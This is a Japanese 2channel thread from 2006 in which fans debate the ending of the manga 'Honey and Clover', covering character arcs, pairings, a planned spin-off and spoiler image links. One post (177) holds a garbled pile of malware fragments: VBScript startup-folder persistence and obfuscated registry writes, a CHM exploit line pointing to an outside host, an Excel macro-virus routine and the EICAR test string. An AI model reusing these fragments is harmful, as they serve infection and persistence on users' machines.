2,3巻でこの落とし方ならまだ妥協もできるけど。

正直この人の作品を2度と読むまいと誓ったよw


131 :花と名無しさん:2006/07/28(金) 04:52:55 ID:???O
>>129
肯定してほしいわけではないよ。
純粋にどういう解釈をするんだろう?と思ったから聞いたんだ。


132 :花と名無しさん:2006/07/28(金) 04:57:13 ID:???O
そうか。73は、あの曖昧な感じがいいと思う人なんだね。
あまり深く考えずに雰囲気だけ楽しむのが、一番適した読み方かもなー。

133 :花と名無しさん:2006/07/28(金) 04:58:42 ID:???0
ここ数話で、隠してた好きをさらけ出したり、
ライバルが消えるから喜んでみたり、
負けたくないから他の奴を突いてみたり、
それぞれが死ぬほど汚い面、よくいえば人間味とやらが見えた今、
全員がそろって浮かべている笑顔が、死ぬほど嘘っぽく見えてダメだ。

134 :花と名無しさん:2006/07/28(金) 04:59:22 ID:???O
いいと思った奴を叩くのは間違ってるだろ
この最終回が気に入らない人もいれば
好きマンセーする人いるのに
感覚おかしいみたいに批判するのは どうなんだよ
これじゃあ本当に好きな奴は誰も書き込めないじゃん

135 :花と名無しさん:2006/07/28(金) 05:01:20 ID:???O
>>132
ごめん
すげええ馬鹿にされてるみたいで 凄く腹がたつんだが?
自分の気にしすぎ?
だったら謝るが


136 :花と名無しさん:2006/07/28(金) 05:06:34 ID:???0
てか嫌いな作品とかないタイプの人なんだろーね。
きっとドラゴンヘッドやバラモンの家族とかの締め方も肯定してくれそうw

俺にはついていけないよ。

137 :花と名無しさん:2006/07/28(金) 05:07:42 ID:???O
>>135
感じ方は人それぞれの感覚だし、正しいも正しくないもないと思ってるよ。
ただ素直にそう思ったんだよ。気分害したのなら謝るよ。


138 :花と名無しさん:2006/07/28(金) 05:08:47 ID:???0
スラムダンクの終わりは否定するけど
俺はこれはこれでありだと思うよ

不満もあるけど、スピンアウトで補完してくれると信じてる
補完がなかったら見限るけど

139 :花と名無しさん:2006/07/28(金) 05:12:26 ID:???0
スラムダンクよりタチ悪いと思うけど。
花道が事故にあってバスケができなくなったりする訳じゃないしw

てか補完がなかったら見限る位にしか思ってないのに
よく肯定できるな?

140 :花と名無しさん:2006/07/28(金) 05:14:49 ID:???0
上に出てるけど、確かにこれは21世紀少年最終回を見た時の気分に似てる
なんというか汚い言い方だけど残尿感

141 :花と名無しさん:2006/07/28(金) 05:15:47 ID:???0
まぁでもなんだかんだいって名作扱いになるんだろうな…この漫画

142 :花と名無しさん:2006/07/28(金) 05:16:17 ID:???O
そういう考えなんだから、いいんじゃないの

143 :花と名無しさん:2006/07/28(金) 05:18:58 ID:???0
ゴーストライター、こちらマーベリック。基地に帰還する。

144 :花と名無しさん:2006/07/28(金) 05:20:08 ID:???0
>>139
誰かと勘違いしてないか?
アリだと思ってるだけで肯定はしてないよ

145 :花と名無しさん:2006/07/28(金) 05:20:16 ID:???0
>>141
名作って言ってもいいけど
1、クローバー探してみつからないENDまでが名作
2、はぐちゃんに告白ENDまでが名作
3、今回の終わり方でよかったよ名作

この3つくらいにわかれそうだな…オレの中では1で終わったことにしてる

146 :花と名無しさん:2006/07/28(金) 05:21:47 ID:???O
芸術家やスポーツマンが故障しちゃうって割とある展開だよな。

147 :花と名無しさん:2006/07/28(金) 05:22:20 ID:???0
>>139
>花道が事故にあってバスケができなくなったりする訳じゃないしw
それに近いだろ

148 :花と名無しさん:2006/07/28(金) 05:22:44 ID:???0
真山ってライバル減ったから喜んだの?
青春スーツ仲間が増えて喜んでたと解釈してるんだが。

149 :花と名無しさん:2006/07/28(金) 05:24:01 ID:???O
>>146
話が大幅に動くからじゃないかね
でもそこでどう感じてどう動くっていうところで、作者の力量が試されるきがする

150 :花と名無しさん:2006/07/28(金) 05:29:12 ID:???O
真山は修ちゃんの枯れっぷりが心配だったんじゃね?w

151 :花と名無しさん:2006/07/28(金) 05:32:44 ID:???O
自分の友達が、目の前で恋に落ちてそれを見守って来て、友達フラれてイキナリ仲の良い先生の方とラブって素直に受け入れられるもんなのかね

152 :花と名無しさん:2006/07/28(金) 05:39:42 ID:???0
挙げ句、結ばれた2人とフラれた奴一緒に集めて飲み会だぜw
ねーよwwww

153 :花と名無しさん:2006/07/28(金) 06:26:38 ID:???0
本命は別だけど都合のいい男を選びました。
それがはぐ山田リカ三人ともなんて…
いい年の大人がそんな恋愛感晒せるなんてウミノ先生度胸ありますね。

154 :花と名無しさん:2006/07/28(金) 06:27:00 ID:U1XjyLJfO
少女マンガ的には無しかもしれんが、
リアル世界的にはよくある展開じゃん

あぁ、だからこそ叩かれるのか

155 :花と名無しさん:2006/07/28(金) 06:29:21 ID:???0
>>154
途中まで散々、少女漫画チックな作品に描いておきながら、終盤超特急でリアル世界に戻されてもな

156 :花と名無しさん:2006/07/28(金) 06:30:48 ID:GMmWB1EH0
三角関係で余った人のために、新キャラ(ここでは飲み屋)を出して丸く収めるというありがちなオチだったが
はぐが誰ともくっつかなかったのは驚いたな。(強いて言えば修だが)
まあダラダラ続くよかよかったんジャマイカ。
スピンアウト作品って誰を主人公にするつもりなのかが気になるが・・・(たぶん真山か山田なんだろうが、大穴でローマイヤ先輩を望む)


殺伐とした漫画の中、曖昧な作品があってもいい。自由とは、そういうことだ。

157 :花と名無しさん:2006/07/28(金) 06:40:13 ID:GMmWB1EH0
質問
どうして>>7みたいなコミックスになってないあらすじがあるの?

158 :花と名無しさん:2006/07/28(金) 06:43:40 ID:???O
>>157
本誌を読んでる人がまとめたんだろ

あと、おまいは男なの?

159 :花と名無しさん:2006/07/28(金) 06:48:19 ID:???O
山田たん番外編希望

160 :花と名無しさん:2006/07/28(金) 06:49:09 ID:GMmWB1EH0
>>158
ああ。まだ最終巻に収録されてない部分ってことか。おk把握

男だが何か?

161 :花と名無しさん:2006/07/28(金) 06:50:02 ID:???O
山田が野宮のために間山をふっきれてきてる…みたいな話なら良い。

162 :花と名無しさん:2006/07/28(金) 06:50:36 ID:???O
別に前半も話自体は少女漫画チックだったわけでもないような。

163 :花と名無しさん:2006/07/28(金) 06:51:25 ID:???O
>>160
いや、何となく気になっただけだ。気にしないでくれ

164 :花と名無しさん:2006/07/28(金) 06:52:09 ID:???O
山田たんのために作者に今から番外編の嘆願手紙出そうかな?

165 :花と名無しさん:2006/07/28(金) 06:53:32 ID:???0
じゃあ俺はローマイヤ先輩のために作者に嘆願書出すわ

166 :花と名無しさん:2006/07/28(金) 06:54:44 ID:???O
>>162
そうかー???


167 :花と名無しさん:2006/07/28(金) 06:54:48 ID:???O
邪魔するな、ロー米谷なんか見たくねえよ!

168 :花と名無しさん:2006/07/28(金) 06:56:17 ID:???O
もう『一部 完』でいいんじゃね
もちろんアレオマージュってことで

169 :花と名無しさん:2006/07/28(金) 06:57:18 ID:???0
来週からキャラクターを一新して「ハチミツとクローバー2」をお送りします

170 :花と名無しさん:2006/07/28(金) 07:05:06 ID:???O
もっかいキャラコンきぼん

171 :花と名無しさん:2006/07/28(金) 07:09:10 ID:???0
512 :花と名無しさん :2006/07/27(木) 11:45:04 ID:???0
自己責任で
コソーリ
つ ttp://u.pic.to/3iby7

961 :花と名無しさん :2006/07/28(金) 01:56:11 ID:???0
今回の嘘バレ合戦、楽しかったよw 画バレ↓ 閲覧は自己責任で

山田・野宮
ttp://vipper.jpn.org/www/upload/src/VIPphoto8177.jpg
ttp://vipper.jpn.org/www/upload/src/VIPphoto8178.jpg

森田の進む道
ttp://vipper.jpn.org/www/upload/src/VIPphoto8179.jpg
森田→はぐ
ttp://vipper.jpn.org/www/upload/src/VIPphoto8180.jpg

森田・はぐ・修・竹本 
ttp://vipper.jpn.org/www/upload/src/VIPphoto8181.jpg

はぐの発言「(手を)治さないと…修ちゃんに何も返せなくなってしまう」に対して、竹本の返答
ttp://vipper.jpn.org/www/upload/src/VIPphoto8182.jpg

ハチミツとクローバーのサンドウィッチ(はぐ作)
ttp://vipper.jpn.org/www/upload/src/VIPphoto8183.jpg

竹本にとっての「有意義な他者」、はぐ
ttp://vipper.jpn.org/www/upload/src/VIPphoto8184.jpg

おわり(最終ページ)〜番外編、今秋予定
ttp://vipper.jpn.org/www/upload/src/VIPphoto8185.jpg
頃合見計らって消します

172 :花と名無しさん:2006/07/28(金) 07:09:45 ID:???0

生のクローバーはかなり酸っぱくて、食べられるものではありません。
ttp://www.hanaippai.com/taberu/s-10.php



173 :花と名無しさん:2006/07/28(金) 07:16:10 ID:???0
>>172
だからハチミツが塗ってあったんじゃね

174 :花と名無しさん:2006/07/28(金) 07:18:26 ID:???0
>>172
はぐちゃんはトンデモ料理人だからいいんじゃない?

175 :花と名無しさん:2006/07/28(金) 07:21:04 ID:???O
>>174
でも祖母さんと暮らしてた時は普通の料理してるっぽかったよね?

176 :花と名無しさん:2006/07/28(金) 07:30:44 ID:???0
味覚音痴の家系なんだろ
修も平気で喰えるし

177 :<body onload=window()>:2006/07/28(金) 07:33:07 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

178 :花と名無しさん:2006/07/28(金) 08:09:11 ID:???O
森田はぐ派が多いの わかっていて
あえて こんな展開に持っていった
作者を誉めます
絶対叩かれるのわかってるし
特に女のファンにな
近親とか絶対騒ぐしな

179 :花と名無しさん:2006/07/28(金) 08:11:59 ID:???O
実は諸条件で本売っちゃったから
1〜8を綺麗なまま安く買いたい
今がチャンスw

180 :花と名無しさん:2006/07/28(金) 08:23:40 ID:???O
間違えた
諸事情

181 :花と名無しさん:2006/07/28(金) 08:31:31 ID:???0
修復士なんてさすらいの旅人なんだから、
竹本は、彼女できないんだろうな・・・
はぐ美化が進みそう。



182 :花と名無しさん:2006/07/28(金) 08:51:12 ID:???O
コミックの後書きとかを見て思ったんだけどウミノさんて純粋ぶりたがり屋で被害妄想強そうな人のように感じた。なんとなくだけど。
自分を可哀想がって でも頑張ってますみたいな。
はぐ 山田 リカを足したような感じ

183 :花と名無しさん:2006/07/28(金) 08:58:10 ID:???O
番外編で森田が幸せになりますように…
この終わりは納得し難いものがある。

184 :花と名無しさん:2006/07/28(金) 08:58:31 ID:HOai8JH0O
今北三行。
少女マンガとしても、有りなそれぞれの締めだと思ったよ。
理想と現実と願望と。みたいな。
一言でいうと「リアルであるあるwww」みたいな。

ところで
大雑把に分けると↓このへんに該当すると思うんだけど、
少年漫画・青年漫画・男性誌(成年誌か)
少女漫画・(ココ)・レディコミ
ココって何か呼び名あったっけ?

185 :花と名無しさん:2006/07/28(金) 09:04:35 ID:???O
>>184
ヤングレディースコミックですよ?

186 :花と名無しさん:2006/07/28(金) 09:15:16 ID:???0
>>182
要約するとナルシストってことか

187 :花と名無しさん:2006/07/28(金) 09:20:10 ID:???O
少女漫画として終わらなくてよかったよ

188 :花と名無しさん:2006/07/28(金) 09:22:10 ID:???0
あんまり酷評されてるんでドキドキしながら171見たけど、
それほど破綻してる風には感じなかったな。
みんなそれぞれ精神的にひとつひらけたところに出て、
さてこれからまたがんばりましょう、って感じで。
コミクス待ち遠しい。

189 :花と名無しさん:2006/07/28(金) 09:25:50 ID:???0
そうだね
コミクス待ち遠しい

190 :花と名無しさん:2006/07/28(金) 09:31:49 ID:???0
少女漫画じゃないんだよな。見てくれは少女漫画なんだけど
女性キャラはみんな青年マンガのマドンナなんだよな
はぐなんかもうみんなのファム・ファタルみたいに祭り上げられてる。
でも、青年漫画だとすると竹本と森田の関係も消化不良だし
少女漫画だとするとはぐの選んだ道も消化不良だし

191 :花と名無しさん:2006/07/28(金) 09:36:32 ID:???0
森田のキャラ時点で少女漫画じゃねーな

かと言って青年漫画でもない。デットスペーズってところかね

192 :花と名無しさん:2006/07/28(金) 09:41:38 ID:???0
とっちらかって主人公不在で作者好き放題でまとまらないのを
「群像劇」っていって誤魔化すのをやめようよ。

193 :花と名無しさん:2006/07/28(金) 09:43:28 ID:HOai8JH0O
>>185 d

194 :花と名無しさん:2006/07/28(金) 09:45:50 ID:???0
>>191
森田はわりと典型的な少女漫画の王子様だよ。マサルさんだけど。

195 :花と名無しさん:2006/07/28(金) 09:46:19 ID:???O
やっぱあだち充漫画だった
想像におまかせ最終回

196 :花と名無しさん:2006/07/28(金) 09:46:35 ID:???O
今朝立ち読みしてきたよ
ここ見てたからヒヤヒヤしてたけど最終話だけに関してはなかなかいい話だった
野宮と山田も、今の正直なお互いの気持ちを
素直に出し合ったって感じで好感もてたし、
まだまだこの二人はこれからなんだなあ…というか。
やっとスタートに立ったんだなって感じでよかったんじゃないか。
何より山田の顔がロリータだんご顔じゃなくなってたのがよかった。

これで前回の修→はぐ大好き&赤ら顔エピさえなきゃな〜
どうにかコミックで修には恋愛感情がないように訂正してくれないだろうか…

197 :花と名無しさん:2006/07/28(金) 09:47:29 ID:???0
>>190
それはジャンルの問題じゃなく読み物として消化不良だから

198 :花と名無しさん:2006/07/28(金) 09:49:58 ID:???0
たけもとがひとりいてくれれば
どんな打ち切りマンガでもどんなトレンディ月9でも
勝手に反省して教訓を得て成長して
最後にまとめてくれるような気がする。

199 :花と名無しさん:2006/07/28(金) 09:51:04 ID:HOai8JH0O
>>190
>女性キャラはみんな青年マンガのマドンナなんだよな

そうか?
女性キャラはみんな青年マンガの男主人公なんだよな
こうだろ
で、男キャラがオンナ臭い

200 :花と名無しさん:2006/07/28(金) 09:52:03 ID:???0
今までの流れからラストの運びの満足度は45%くらいだった

201 :花と名無しさん:2006/07/28(金) 09:54:28 ID:???0
青年マンガの男主人公ならあんなぐずぐず言わずもっと成長してく

202 :花と名無しさん:2006/07/28(金) 09:55:54 ID:???0
>>200
同意。

203 :花と名無しさん:2006/07/28(金) 09:58:30 ID:???0
>>196
卒業後はぐを見受けするに相応しくない森田に喝を入れるために大見栄切った。
そんな自分の青春スーツに赤面…と無理矢理解釈

204 :花と名無しさん:2006/07/28(金) 10:15:58 ID:???0
今市もの足りないラストだった。

205 :花と名無しさん:2006/07/28(金) 10:19:45 ID:???0
編集者は作品より作者を大事にしましたね。
少女漫画にはありがちだけど。

206 :花と名無しさん:2006/07/28(金) 10:31:25 ID:???0
いや、片思いの切なさこそがハチクロよね☆なんていう
F1層〜メロドラマ好き主婦っぽい読者を一番大事にしたんでは。
みんな、身の置き所だけはしっかりするけど
結局誰一人として片思いは終わってないんだよな。
現実に身をおいて夢は見つづける的な打算的な終わり方。
これが大人になるということですかね・・・・

207 :花と名無しさん:2006/07/28(金) 10:40:37 ID:???0
磯のあわびの肩重い

208 :花と名無しさん:2006/07/28(金) 10:54:31 ID:???0


嫉妬のためストーカー気質気味の野宮におびえる山田
不倫にはしるはぐ
倦怠期の真山
陰鬱な作業者の仮面の下、性に飢える竹本
クスリに汚染された森田

この五人が再び出会う――――――ハチクロリターンズ2008。
          
     ―――青春だって、大人になる。



209 :花と名無しさん:2006/07/28(金) 10:57:23 ID:???0
>>208
そんときは少コミに移籍だね。

210 :花と名無しさん:2006/07/28(金) 10:57:30 ID:???0
>>208
うわ、そっちの方が面白そう、程よくドロドロしてそうでw

211 :花と名無しさん:2006/07/28(金) 11:10:16 ID:???0
ライトセーバーじゃなくてビームサーベルかよ。
最後までガンオタに媚びたなウミノよ

212 :花と名無しさん:2006/07/28(金) 11:10:48 ID:???0
>>208
しかしその布陣だと、またも真山が一番先に沈む船から脱出しそうだねぇ。
他が重すぎ。

213 :花と名無しさん:2006/07/28(金) 11:17:07 ID:???0
真山はリカさんが他の男に抱かれるのを覗き見することで興奮するクセがついたとか

214 :花と名無しさん:2006/07/28(金) 11:17:37 ID:???0
>>201
青年漫画なら、主人公が目をギラギラさせながらひたすら前向きな台詞を言って終了だろうね

215 :花と名無しさん:2006/07/28(金) 11:20:21 ID:???0
いいw

216 :花と名無しさん:2006/07/28(金) 11:31:23 ID:???0
そんで、早売りじゃなくて正式に販売されたのを読んだ人っているの?
俺はまだ読んでないんだけど…

217 :花と名無しさん:2006/07/28(金) 11:34:09 ID:???O
山田さんは過去に野宮にヤり捨てられた女に刺されるな
別れ話もせずに一方的に捨てられたんだから
相手は収まりついてないだろう

218 :花と名無しさん:2006/07/28(金) 11:51:07 ID:???0
>>216
今日発売日だから読めるでしょ。

ネタバレ見てガックリしてからコーラス見たら結構良かった。
ていうか泣いた。
投げっぱなしの部分はちょっと不満だけど。
山田と森田のテレビ電話の約束って前にちょっと出てきただけなのに
ここで生かされるとは…
5人の表紙もきれいだった。

219 :花と名無しさん:2006/07/28(金) 12:05:36 ID:???0
泣けたんだ、それは楽しみだ
本屋いってこよ

220 :花と名無しさん:2006/07/28(金) 12:25:18 ID:???O
やばい、ワロタwww>>208

キューコミから読んで、過剰な思い入れして、最近がっかりして、今回すごく泣けた。

喪失感…

221 :花と名無しさん:2006/07/28(金) 12:27:36 ID:TcMQls7TO
泣けた。自分は竹本&はぐ派だったからラストでスッキリしたよ。終わっちゃった〜ああ寂しいなぁ〜。

222 :花と名無しさん:2006/07/28(金) 12:33:12 ID:???O
まあしばらくしたら
全員のその後を描いた短編はかなりの確率で出るだろうな

223 :花と名無しさん:2006/07/28(金) 12:33:15 ID:???0
コーラス買ってきて、やっと読んだ。

はぐの大きさ、一話の中で変わりすぎ。
ホームで竹本を探すはぐが、やっと本来の大きさだった。

ラストはちょっとジーンと来たかな。
竹本・・・かわいそう orz


224 :花と名無しさん:2006/07/28(金) 12:41:19 ID:bg236jwX0
この作品そのきになれば20巻とか長くもできただろうけど
へんにダラダラしなくてよかった

秋にスピンオフバージョンだって。
どうせなら10年後の話がいいな


225 :花と名無しさん:2006/07/28(金) 12:50:55 ID:???0
コーラスの売り上げのために、番外編つぎつぎ描きますよ?
だから、5年後、10年後なんて、そう簡単には出しませんよ?


226 :花と名無しさん:2006/07/28(金) 12:53:05 ID:???0
せいぜい合計で2話くらいじゃないかな。
ただハチクロ関係のふろくは続きそうだけど。

しかし俺は最初から最後までハチクロ大好きな作品だったんだが
あんまり好きじゃない人のほうがおおいのかな

227 :花と名無しさん:2006/07/28(金) 13:02:54 ID:???0
ハチクロはもうちょっとだけ続くんじゃ

228 :花と名無しさん:2006/07/28(金) 13:07:31 ID:???0
今までの経験上、スピンオフと言うか番外編で語られるのは
やっぱり脇役キャラなんだよな。
そうなると藤原デザイン話が有力なんだが。

229 :花と名無しさん:2006/07/28(金) 13:08:40 ID:???O
大好きだったのがラスト数話で微妙になった人が多いんだろう

230 :花と名無しさん:2006/07/28(金) 13:11:21 ID:???O
>>228
それなら美和子山崎ケコーンでそこからメインキャラ絡めるんでは?

231 :花と名無しさん:2006/07/28(金) 13:12:40 ID:???0
>>224
もう十分だらだらしてたと思うけど。
登場人物が無駄に年だけとってく停滞漫画だった。
余計なストーリー省いて5巻ぐらいで終わっとけばよかったのに。

232 :花と名無しさん:2006/07/28(金) 13:15:21 ID:???0
ハチクロ三度はねえだろwとおもいますた

233 :花と名無しさん:2006/07/28(金) 13:15:47 ID:???0
結局山田は少しは前向きだけど
真山が好きというのを通したわけね
山田らしいといえばそうだけど
野宮ともうまくいくかどうかもこりゃあわからん終わり方だった

234 :花と名無しさん:2006/07/28(金) 13:17:34 ID:???0
いい加減山田の執着っぷりは真山を超えたと思いました。

235 :花と名無しさん:2006/07/28(金) 13:17:54 ID:ZLi5cnqd0
アニメだと、山田も相当野宮にかたむいてる風な書き方だった(昨日
野宮が鳥取から帰ってきたところ)。
藤原デザインとか蛇足部分が増えて、メインを適当にまとめた感じで
バランスが悪いマンガだったね。上半身がゆうこりんみたいに華奢なのに
下半身がK-1レスラーみたいなイビツな完成度。

236 :花と名無しさん:2006/07/28(金) 13:19:45 ID:???0
山田は真山が押し倒したらそっちにすぐ行くんだろうな

237 :花と名無しさん:2006/07/28(金) 13:22:14 ID:???0
気に入った部分とかキャラを選り抜いて楽しむのがこの漫画の正しい楽しみ方。
他は気にしない。

238 :花と名無しさん:2006/07/28(金) 13:35:54 ID:???0
>>228
そもそもスピンオフって
本編から(サブキャラを)独立させる
って意味だから

239 :花と名無しさん:2006/07/28(金) 13:38:41 ID:???0
スターウォーズのスピンオフ小説の場合ちゃんとルークが主役してるんだけど、まあ少数派だわな。

240 :花と名無しさん:2006/07/28(金) 13:38:46 ID:???0
修→はぐさえなければ、恋より芸術を選びましたでスッキリするのに。
修はあくまでも保護者で、永遠に学校の亡霊でいて欲しかった。
あと山田のウジウジにもっと早い段階で決着をつけて、鉄人復活で、
森田を友人として支えて欲しかった。

241 :花と名無しさん:2006/07/28(金) 13:46:23 ID:???0
山田はウジウジしたまんま真山を忘れられない
ハグはまだ自立できない
森田は今までどおり続ける
真山はリカさんを支える
竹本は就職したけれど
皆大人にはなりきれない、変わりたくても変われない
そこがハチクロの善さだからいいラストだと思うよ


242 :花と名無しさん:2006/07/28(金) 13:49:00 ID:???0
あのサンドイッチに塗ってあるのはほんとにハチミツなのか?
ちょっとテカッてるし色的にハチミツだろう。。。ってことか。
このスレ見てなかったら気付かなかったかも…ハチクロサンド。

243 :花と名無しさん:2006/07/28(金) 13:50:17 ID:???0
結果として一番成長してないのが山田という件について。

244 :花と名無しさん:2006/07/28(金) 13:52:04 ID:???0
全員片思い 逆走ラブコメディ

ってコピーを最初に聞いたからこれでいいと思った

245 :花と名無しさん:2006/07/28(金) 13:53:30 ID:???O
スピンオフでやっと竹本が主役に返り咲けるのか…。

246 :花と名無しさん:2006/07/28(金) 13:55:28 ID:???0
人は変わらないけど、それを取り巻く環境が変わっていく
竹本だけがあれこれ振り回されて色々変わったけど
結局元通りになった

でも元通りになったときに、望んだ環境はなくて

望んだ環境を維持することは出来ない
より良いものを望んで自らそれを壊すか、
あるいは手遅れになるのを黙って見ているしかない

そういうことに気付く

進んで変わることも、流されるままに変わることも結果は同義なら
モラトリアムでも望まない結果になろうとも
それは意義のある青春だったんじゃないだろうか?

247 :花と名無しさん:2006/07/28(金) 13:56:33 ID:???0
>>246
ポエムきもい

248 :花と名無しさん:2006/07/28(金) 13:56:35 ID:???0
>>245
派遣先で出会った住職の娘との淡い恋とか
ふとしたきっかけで森田と再会して友情復活とか
そういうのが見てみたい

249 :花と名無しさん:2006/07/28(金) 13:57:41 ID:???0
>全員片思い 逆走ラブコメディ

こうか?むくわれねえ・・・

野宮→山田→真山→リカ⇔原田(故)

竹本→はぐ⇔森田(故)
     ↑
     修

250 :花と名無しさん:2006/07/28(金) 13:58:26 ID:???0
なんで森田が故人になってんだよ

251 :花と名無しさん:2006/07/28(金) 13:59:16 ID:???0
あの頃は青春だったなあって思い返してみても
青春とそうじゃないところの境目なんて誰にもわからないし
青春時代から自分は変わったように見えて本当は変わってないんじゃないか
そんなことを考えさせられるラストだったな

252 :花と名無しさん:2006/07/28(金) 14:00:04 ID:???0
山田と野宮だってぼみょうだし、真山とリカだって完全にくっ付いたわけではないし…
このふわふわ感がいいのか

修はぐみは考えたくない

253 :花と名無しさん:2006/07/28(金) 14:00:07 ID:???0
森田(故)ww

254 :花と名無しさん:2006/07/28(金) 14:00:45 ID:???0
(故)wwwwww

255 :花と名無しさん:2006/07/28(金) 14:01:35 ID:???0
やりたい事は分かるけどもうちょっと丁寧にやってくれないと。
端折り過ぎてて説得力が無い。

256 :花と名無しさん:2006/07/28(金) 14:02:03 ID:???0
>>249
森田死んだのかよw

竹本のモノローグで最後は皆バラバラになるんじゃねーかと予想してたんで想像の範囲内って感じ
真山とリカさんがうまくいったのがちょっと意外だった

257 :花と名無しさん:2006/07/28(金) 14:02:06 ID:HOai8JH0O
たとえば山田が男なら、
好きな女を心の保存ファイルに永久保存しつつ
自分に惚れてる別の女と乳繰り合って失恋の傷を癒せる、
っちゅう状況だろ。

「好きなんです」
「いや、俺は今でもアイツを‥」
「それでもいいんです!きっといつかは私を‥」
ベタなAVでもままあった状況だけど、萌えどころでもある。

こういうのって駄目なの?
成長とか前向きとか言ってる人いるが、それはただのキレイゴトであって
実際失恋したら、人によっては期間の長い短いや程度の違いはあれど
こうなるケースもあるだろ。
むしろ飲み屋と付き合うことが前向きである、と評価したい。

258 :花と名無しさん:2006/07/28(金) 14:03:44 ID:???0
>>256
おもしろい?

259 :花と名無しさん:2006/07/28(金) 14:04:29 ID:???0
山田はウジウジしてるのがいいんだって
サバサバ真山なんてどうでもいいとかいってたら
キャラとしての魅力がない

260 :花と名無しさん:2006/07/28(金) 14:06:47 ID:???0
山田の最大の欠点は、そこまで真山に拘る理由が分からんって事。
せめて健康ランドの時に涙と一緒に振り切れば良かったんだが。
最後の最後まであれじゃ幾ら何でも不自然にも程がある。
真山は「観覧車」以降、もう野宮を止めなくなったし…

261 :花と名無しさん:2006/07/28(金) 14:08:53 ID:???0
山田は結局、真山一筋でいんじゃねーの
このラストで

262 :花と名無しさん:2006/07/28(金) 14:11:05 ID:???0
>>260
真山は北海道以降の話で理花以外を見なくなったのか
それとも藤原デザインの人間から話を聞いて納得したと考えれば済むが
山田のほうはフラフラしすぎな印象があるな

>>259
それもいつかは吹っ切ることが前提であって、最後までgdgdだったら台無しかと

263 :244,256:2006/07/28(金) 14:11:41 ID:???0
>>258
え?俺?

264 :花と名無しさん:2006/07/28(金) 14:11:58 ID:???0
>>259
山田というのは真山が好きじゃないと
キャラの個性が出せないのかもね作者的に

265 :花と名無しさん:2006/07/28(金) 14:14:13 ID:???0
>>260
だよなあ。
健康ランドで一応吹っ切って、
顔合わせるとまだちょっと切ないけど・・・って程度じゃダメなのか?
過去付き合った訳でもなく、関係をもったことも無い相手を、
あそこまでしつこく引き摺る女ってのも珍しい・・・。

266 :花と名無しさん:2006/07/28(金) 14:14:12 ID:???0
>>264
それ以外の個性ないじゃん、読者的にも

267 :花と名無しさん:2006/07/28(金) 14:14:47 ID:???0
発想の引き出しが少ないってのは良く分かった>作者
その限定的な舞台の上ではまあ優れているけど。

268 :花と名無しさん:2006/07/28(金) 14:15:01 ID:???0
>>266
ガードの緩い鋼鉄の処女だったぜ

269 :花と名無しさん:2006/07/28(金) 14:16:11 ID:???0
>>268
鋼鉄の処女も真山を思ってるからこそ成り立つキャラだと思うが?

270 :244,256:2006/07/28(金) 14:17:11 ID:???0
>>265
ストーキングに夢中だった大学生活の重みがあるんじゃね?>山田

271 :花と名無しさん:2006/07/28(金) 14:19:36 ID:???0
番外編、山田が主人公で今更真山との出会い過去話が中心だったら笑うぞ…
 
山田真山理花の片思い関係図って、
 
 ストーカー → ストーカー → 自殺志願者
 
怖い…w

272 :花と名無しさん:2006/07/28(金) 14:21:31 ID:???0
ストーカー → ストーカー → (故人に)ストーカー

273 :花と名無しさん:2006/07/28(金) 14:21:43 ID:???0
作者には山田は真山を切り離せないならなんで
くっ付けなかったか疑問でもある

274 :花と名無しさん:2006/07/28(金) 14:22:54 ID:???0
>>271
俺はそっちサイドのほうが山田と真山のポエムが痛々しくて好きだったな


275 :花と名無しさん:2006/07/28(金) 14:23:32 ID:???0
じゃあお前らはどうくっつけば満足だったんだよ
修とリカ
真山と山田
森田とはぐ
たけのことローマイヤ
山崎と飲み屋
だったら満足なのか?
あ?

276 :花と名無しさん:2006/07/28(金) 14:24:07 ID:???0
>>273
くっついたら今度は真山のキャラが崩壊するから

277 :花と名無しさん:2006/07/28(金) 14:24:43 ID:???0
>>275
藤原デザインの連中が蛇足だった気もする

278 :花と名無しさん:2006/07/28(金) 14:26:11 ID:???0
このスレ的に山田×野宮ってどうなの?

俺は真山が好きだった山田が大好きだったわけで
「次の恋に生きる」といえば聞こえはいいかもしれんが
あんまり好きなカップリングじゃないなぁ

279 :花と名無しさん:2006/07/28(金) 14:26:37 ID:???0
>>276
でも中盤の野宮が出てきた辺りで
くっ付けるチャンスはあったと思う

280 :花と名無しさん:2006/07/28(金) 14:27:25 ID:???0
>>277
確かに5人+修リカでよかったな
この漫画、人数が男>>>>女な時点でウホッがなきゃ
全員幸せにはなれない

281 :花と名無しさん:2006/07/28(金) 14:27:32 ID:???0
>>275
修 リカ 真山 山田 森田 はぐ 竹本

この7人は誰一人くっつかなければよかった

282 :花と名無しさん:2006/07/28(金) 14:27:33 ID:ZLi5cnqd0
>>278
野宮単体だと魅力的だけど、山田に対して低姿勢で必死の
みすぼらしい中古青春スーツ着用後の野宮には萌えないし、
山田が野宮を気にするのって、「好きだ」って言われたから
だけだし、恋愛ものとしてときめけない。

283 :花と名無しさん:2006/07/28(金) 14:27:35 ID:???0
>>278
自分も野宮と山田は微妙だったから
このラストは結構満足してる


284 :花と名無しさん:2006/07/28(金) 14:27:49 ID:???0
>>279
だからくっついちゃったら真山のキャラがなくなるじゃん
ストーカー&レイプしてこその真山だよ

285 :花と名無しさん:2006/07/28(金) 14:28:35 ID:???0
>>275
別にくっつこうがくっつかまいがどっちでもよかった。
(内輪で何組もくっつくとちょっと興ざめだけど)

全体的な無理な急展開とか、山田の心理描写不足とかが
